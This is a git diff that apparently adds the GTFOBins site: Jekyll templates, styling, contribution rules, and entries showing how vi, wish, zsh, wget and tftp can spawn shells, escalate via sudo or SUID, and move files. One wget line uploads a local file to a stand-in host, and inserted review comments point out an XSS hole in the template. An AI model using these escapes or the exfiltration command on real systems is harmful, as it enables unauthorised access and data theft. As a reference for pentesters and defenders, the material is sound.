a/_gtfobins/tftp.md b/_gtfobins/tftp.md new file mode 100644 index 0000000..580f037 --- /dev/null +++ b/_gtfobins/tftp.md @@ -0,0 +1,15 @@ +--- +functions: + upload: + - description: Send local file to a TFTP server. + code: | + RHOST=10.0.0.1 + tftp $RHOST + put file_to_send + download: + - description: Fetch a remote file from a TFTP server. + code: | + RHOST=10.0.0.1 + tftp $RHOST + get file_to_get +--- \ No newline at end of file 
diff --git a/_gtfobins/vi.md b/_gtfobins/vi.md new file mode 100644 index 0000000..5baf153 --- /dev/null +++ b/_gtfobins/vi.md @@ -0,0 +1,13 @@ +--- +functions: + exec-interactive: + - code: vi -c ':!/bin/sh' + - code: | + vi + :set shell=/bin/sh + :shell + sudo-enabled: + - code: sudo vi -c ':!/bin/sh' + suid-enabled: + - code: ./vi -c ':!/bin/sh -p' +--- \ No newline at end of file diff --git a/_gtfobins/wget.md b/_gtfobins/wget.md new file mode 100644 index 0000000..b4ab2d8 --- /dev/null +++ b/_gtfobins/wget.md @@ -0,0 +1,15 @@ +--- +functions: + upload: + - description: Send base64-encoded local file via "d" parameter of a HTTP POST request. + code: | + export URL=http://10.0.0.1/ + export LFILE=file_to_send + wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL + download: + - description: Fetch a remote file via HTTP GET request. + code: |- + export URL=http://10.0.0.1/file_to_get + export LFILE=file_to_get + wget $URL -O $LFILE +--- \ No newline at end of file diff --git a/_gtfobins/wish.md b/_gtfobins/wish.md new file mode 100644 index 0000000..44e08d5 --- /dev/null +++ b/_gtfobins/wish.md @@ -0,0 +1,11 @@ +--- +functions: + exec-interactive: + - code: | + wish + exec /bin/sh <@stdin >@stdout 2>@stderr + sudo-enabled: + - code: | + sudo wish + exec /bin/sh <@stdin >@stdout 2>@stderr +--- \ No newline at end of file diff --git a/_gtfobins/zsh.md b/_gtfobins/zsh.md new file mode 100644 index 0000000..acd3330 --- /dev/null +++ b/_gtfobins/zsh.md @@ -0,0 +1,9 @@ +--- +functions: + exec-interactive: + - code: zsh + sudo-enabled: + - code: sudo zsh + suid-enabled: + - code: ./zsh +--- \ No newline at end of file diff --git a/_includes/bin_table.html b/_includes/bin_table.html new file mode 100644 index 0000000..263a052 --- /dev/null +++ b/_includes/bin_table.html @@ -0,0 +1,57 @@ + + +
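Review bot: The wget.md `upload` example, `wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL`, puts raw base64 into a form-encoded body, and base64 output contains `+`, `/` and `=`; a server decoding `application/x-www-form-urlencoded` turns every `+` into a space, so the receiver cannot recover the file without first undoing that. It also places the entire encoded file on the command line, where it is visible to any local user via `ps` and capped by the argument-length limit. `wget --post-file=$LFILE $URL` sends the bytes as the request body without either problem; if the form-field shape is wanted, the description should at least warn the reader to decode with `tr ' ' '+'` first.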
+ + + + + + + + +{% for file in site.gtfobins %} + + + + +{% endfor %} + + + + +
BinaryFunctions
{% include get_bin_name path=file.path %}{% include function_list.html bin=file %}
No binary matches...
+
+ + diff --git a/_includes/function_list.html b/_includes/function_list.html new file mode 100644 index 0000000..89d9b27 --- /dev/null +++ b/_includes/function_list.html @@ -0,0 +1,6 @@ + diff --git a/_includes/functions_description.html b/_includes/functions_description.html new file mode 100644 index 0000000..3492afb --- /dev/null +++ b/_includes/functions_description.html @@ -0,0 +1,7 @@ +
+{% for function_pair in site.data.functions %} +{% assign function = function_pair[1] %} +
{{ function.label }}
+
{{ function.description | markdownify }}
+{% endfor %} +
diff --git a/_includes/get_bin_name b/_includes/get_bin_name new file mode 100644 index 0000000..dda1301 --- /dev/null +++ b/_includes/get_bin_name @@ -0,0 +1 @@ +{% assign fn_parts = include.path | split: '/' | last | split: '.' %}{% assign fn_parts_size = fn_parts | size %}{% if fn_parts_size < 3 %}{{- fn_parts[0] -}}{% else %}{{- fn_parts[0] -}}.{{- fn_parts[1] -}}{% endif %} \ No newline at end of file diff --git a/_includes/page_title.html b/_includes/page_title.html new file mode 100644 index 0000000..df8efdb --- /dev/null +++ b/_includes/page_title.html @@ -0,0 +1,6 @@ +

+ {% if page.url != '/' %} + .. / + {% endif %} + {{ include.title }} +

diff --git a/_layouts/bin.html b/_layouts/bin.html new file mode 100644 index 0000000..92caa10 --- /dev/null +++ b/_layouts/bin.html @@ -0,0 +1,46 @@ +--- +layout: common +--- + +{% capture bin_name %}{% include get_bin_name path=page.path %}{% endcapture %} + +{% include page_title.html title=bin_name %} + +{% include function_list.html bin=page %} + +{{ page.description | markdownify }} + +{% for function in page.functions %} + +{% assign function_name = function[0] %} +{% assign examples = function[1] %} + +

+{{- site.data.functions[function_name].label -}} +

+ +{{ site.data.functions[function_name].description | markdownify }} + +{% for example in examples %} + +
+{{ example.description | markdownify }} + +{% capture code %} +{%- if function_name == 'suid-enabled' or function_name == 'suid-limited' %} +cp $(which {{ bin_name }}) . +sudo chown 0 ./{{ bin_name }} +sudo chmod +s ./{{ bin_name }} +{% endif %} +{{ example.code }} +{% endcapture %} + +

+{{- code | strip -}}
+
+ +
+ +{% endfor %} + +{% endfor %} diff --git a/_layouts/common.html b/_layouts/common.html new file mode 100644 index 0000000..6a5cdf0 --- /dev/null +++ b/_layouts/common.html @@ -0,0 +1,22 @@ + + + + + + {{ site.title }} + {% if page.url != '/' %} + | + {% if page.layout == 'bin' %} + {{ page.title | downcase }} + {% else %} + {{ page.title }} + {% endif %} + {% endif %} + + + + + +{{ content }} + + diff --git a/_layouts/page.html b/_layouts/page.html new file mode 100644 index 0000000..76d6025 --- /dev/null +++ b/_layouts/page.html @@ -0,0 +1,7 @@ +--- +layout: common +--- + +{% include page_title.html title=page.title %} + +{{ content }} diff --git a/contribute.md b/contribute.md new file mode 100644 index 0000000..9455417 --- /dev/null +++ b/contribute.md 
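Review bot: In `_layouts/bin.html` the example code is emitted into the page unescaped: `{{- code | strip -}}` writes the `code` field verbatim (the surrounding `pre`/`code` tags appear to have been stripped from this rendering, so this is inferred from the capture block). Entries already in this commit contain markup-significant characters, e.g. tclsh's `exec /bin/sh <@stdin >@stdout 2>@stderr`, which the browser will parse as tags and mangle, and since `_gtfobins/*.md` is populated from pull requests a contributor could place arbitrary HTML or script in every page of the site. Change the line to `{{- code | strip | escape -}}`; the same consideration applies to `{{ example.description | markdownify }}` and `{{ page.description | markdownify }}` if raw HTML in descriptions is not intended, as kramdown passes inline HTML through.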
@@ -0,0 +1,45 @@ +--- +layout: page +title: Contribute +--- + +## Structure + +Each GTFO binary is defined in a file in the `_gtfobins/` folder named as `.md`, such file consists only of a [YAML] front matter which describes the binary and its functions. + +[YAML]: http://yaml.org/ + +The full syntax is the following: + +``` +description: Optional description of the binary +functions: + FUNCTION: + - description: Optional description of the example + code: Code of the example + - .... + FUNCTION: + - description: Optional description of the example + code: Code of the example + - ... + ... +``` + +Where `FUNCTION` is one of the values described in the `_data/functions.yml` file. + +Feel free to use any file in the `_gtfobins/` folder as an example. + +Pull request process +-------------------- + +Vendor software is accepted as well as standard Unix binaries. Binaries and techniques that only works on certain operating systems and versions are accepted and such limitations shall be noted in the `description` field. + +Before sending a pull request of a new binary or function, ensure the following: + +1. Verify the function works on at least one type of modern Unix system. +2. Classifying SUID-related functions may be tricky because they depend on how the default shell behaves on different systems (i.e. Ubuntu vs. Debian) and how the external command is called (i.e. `exec()` family vs. `system()`). Check how the binary behaves: + - The function is considered `suid-enabled` if runs external commands with SUID privileges on Ubuntu Linux. + - The function is considered `suid-limited` if runs external commands with SUID privileges on Debian but it drops the privileges on Ubuntu Linux. +3. Verify `sudo-enabled` function runs external commands under the `sudo` privileged context. + +Pull requests adding new functions in `_data/functions.yml` are allowed and subjected to project maintainers vetting. 
diff --git a/functions.md b/functions.md new file mode 100644 index 0000000..44fddcd --- /dev/null +++ b/functions.md @@ -0,0 +1,8 @@ +--- +layout: page +title: Functions +--- + +A binary may support one or more of the following functions: + +{% include functions_description.html %} diff --git a/index.md b/index.md new file mode 100644 index 0000000..44ae760 --- /dev/null +++ b/index.md @@ -0,0 +1,16 @@ +--- +layout: page +title: GTFOBins +--- + +GTFOBins is a curated list of Unix binaries that can be leveraged by an attacker to bypass system security restrictions. + +This was inspired by the [LOLBins and LOLScripts](https://github.com/api0cradle/LOLBAS) project for Windows environment. + +The project collects legitimate Unix binaries that can be abused to get the f**k break out restricted shells, escalate or maintain elevated privileges, download or exfiltrate files, and facilitate the other post-exploitation tasks outlined [here](/functions/). + +GTFOBins aims to be a shared project where everyone can contribute with additional binaries and techniques. You can find detailed instructions [here](/contribute/). + +## List of GTFOBins + +{% include bin_table.html %} diff --git a/style.scss b/style.scss new file mode 100644 index 0000000..c8c1d38 --- /dev/null +++ b/style.scss 
@@ -0,0 +1,117 @@ +--- +--- + +$accent: #bf0707; +$lighter: #fff4f4; +$hover: #ff0000; + +// layout + +@media (min-width: 1000px) { + body { + width: 800px; + margin: 0 auto; + } +} + +// common tags + +body { + font-family: sans, sans-serif; +} + +code { + padding: 0.15em 0.25em; + border-radius: 0.25em; + color: $accent; + background: $lighter; +} + +pre { + background: $lighter; + padding: 1em; + overflow-x: auto; + + code { + padding: 0; + border-radius: 0; + } +} + +a:link, a:visited { + color: $accent; +} + +a:hover { + color: $hover; +} + +// fragment targets + +*:target { + border-left: 5px solid $accent; + padding-left: 5px; +} + +// binary list and search + +#bin-search { + padding: 0.5em; + width: 100%; + box-sizing: border-box; +} + +#bin-table { + width: 100%; + + th, td { + padding: 0.2em 1em; + } + + th { + text-align: left; + } + + #search-message { + text-align: center; + padding: 1em; + } +} + +// function description + +.function-list { + font-size: 0.8rem; + list-style: none; + padding: 0; + margin: 0; + + li { + display: inline-block; + padding: 0.25em 0.5em; + margin: 0.05em 0; + border: 1px solid $accent; + + a:link, a:visited { + color: $accent; + text-decoration: none; + } + + &:hover, a:hover { + color: $hover; + border-color: $hover; + } + } +} + +// classes + +.bin-name { + font-family: monospace; + font-size: 1.2rem; +} + +.function-name { + font-size: 1.4rem; + font-weight: bold; +}